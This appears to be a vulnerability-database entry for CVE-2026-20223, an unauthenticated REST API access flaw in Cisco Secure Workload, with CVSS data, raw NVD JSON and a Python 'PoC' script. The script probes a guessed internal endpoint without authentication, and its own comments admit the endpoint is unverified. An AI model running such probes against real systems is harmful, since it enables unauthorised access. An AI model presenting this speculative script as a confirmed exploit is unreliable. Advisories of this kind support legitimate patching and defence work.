Security Vulnerability Report
中文
CVE-2026-20223 CVSS 10.0 CRITICAL

CVE-2026-20223

Published: 2026-05-20 17:16:20
Last Modified: 2026-05-20 17:30:40
Source: [email protected]

Description

A vulnerability in the access validation of internal REST APIs of Cisco Secure Workload could allow an unauthenticated, remote attacker to access site resources with the privileges of the Site Admin role. This vulnerability is due to insufficient validation and authentication when accessing REST API endpoints. An attacker could exploit this vulnerability if they are able to send a crafted API request to an affected endpoint. A successful exploit could allow the attacker to read sensitive information and make configuration changes across tenant boundaries with the privileges of the Site Admin user. 

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_cve_2026_20223(target_url): """ PoC for CVE-2026-20223: Cisco Secure Workload Authentication Bypass. This script attempts to access internal API endpoints without authentication. """ headers = { # Vulnerability implies lack of validation, so we might send specific headers # or simply omit authentication headers to test for bypass. "User-Agent": "CVE-2026-20223-Scanner" } # Example endpoint that might be vulnerable (needs verification) endpoint = f"{target_url}/api/v1/internal/site_admin" try: print(f"[*] Attempting to access {endpoint} without authentication...") response = requests.get(endpoint, headers=headers, verify=False, timeout=10) if response.status_code == 200: print("[+] Potential exploit successful! Response received:") print(response.text[:200]) # Print first 200 chars else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": # Replace with actual target IP/Hostname target = "https://<target-ip>" exploit_cve_2026_20223(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20223", "sourceIdentifier": "[email protected]", "published": "2026-05-20T17:16:20.400", "lastModified": "2026-05-20T17:30:40.450", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the&nbsp;access validation of internal REST APIs of Cisco Secure Workload could allow an unauthenticated, remote attacker to access site resources with the privileges of the&nbsp;Site Admin role.\r\n\r\nThis vulnerability is due to insufficient validation and authentication when accessing REST API endpoints. An attacker could exploit this vulnerability if they are able to send a crafted API request to an affected endpoint. A successful exploit could allow the attacker to read sensitive information and make configuration changes across tenant boundaries with the privileges of the&nbsp;Site Admin user.&nbsp;"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-csw-pnbsa-g8WEnuy", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.